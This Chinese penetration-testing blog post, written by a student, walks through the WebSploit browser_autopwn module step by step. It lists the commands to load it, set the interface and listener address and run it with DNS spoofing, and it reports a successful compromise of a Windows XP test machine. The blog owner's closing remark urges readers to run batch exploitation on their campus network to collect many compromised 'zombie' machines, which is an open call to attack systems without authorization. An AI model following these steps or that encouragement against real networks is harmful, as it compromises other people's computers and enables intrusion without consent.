学员渗透录十八 websploit溢出实战

暗月博客 2019年11月21日21:07:47评论388 views字数 421阅读1分24秒阅读模式
摘要

学员渗透录 十八 websploit溢出实战 作者:新月 第十八篇咯,这期是新月学员编写咯,大家换来围观把。

学员渗透录十八 websploit溢出实战

作者:新月

第十八篇咯,这期是新月学员编写咯,大家换来围观把。

AD:学渗透暗月,学代码审计暗月

以下是正文:

首先打开websploit,终端输入websploit

学员渗透录十八 websploit溢出实战

学员渗透录十八 websploit溢出实战

输入 show modules 来看所有的模块:

学员渗透录十八 websploit溢出实战

学员渗透录十八 websploit溢出实战

我们看到有exploit/browser_autopwn这个模块,然后载入 use exploit/browser_autopwn

学员渗透录十八 websploit溢出实战

学员渗透录十八 websploit溢出实战

我们来看一下有什么要配置的  show options

学员渗透录十八 websploit溢出实战

Ifconfig看一下ip

学员渗透录十八 websploit溢出实战

配置一下  set interface eth0   set lhost 192.168.192.146

配置完成后运行run

学员渗透录十八 websploit溢出实战

学员渗透录十八 websploit溢出实战

要等几分钟才配置好 这里dnsspoof运行起来了

学员渗透录十八 websploit溢出实战

配置完毕:

学员渗透录十八 websploit溢出实战

xp测试一下

学员渗透录十八 websploit溢出实战

学员渗透录十八 websploit溢出实战

ok成功

学员渗透录十八 websploit溢出实战

暗月总结:websploit一个实战溢出案例,webspoit 若内网批量溢出,效果是相当犀利,有条件的同学 在校园网试试,保证肉鸡多多。

最后很感谢新月给我们带来这样精彩的文章。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:07:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   学员渗透录十八 websploit溢出实战https://cn-sec.com/archives/71820.html

发表评论

匿名网友 填写信息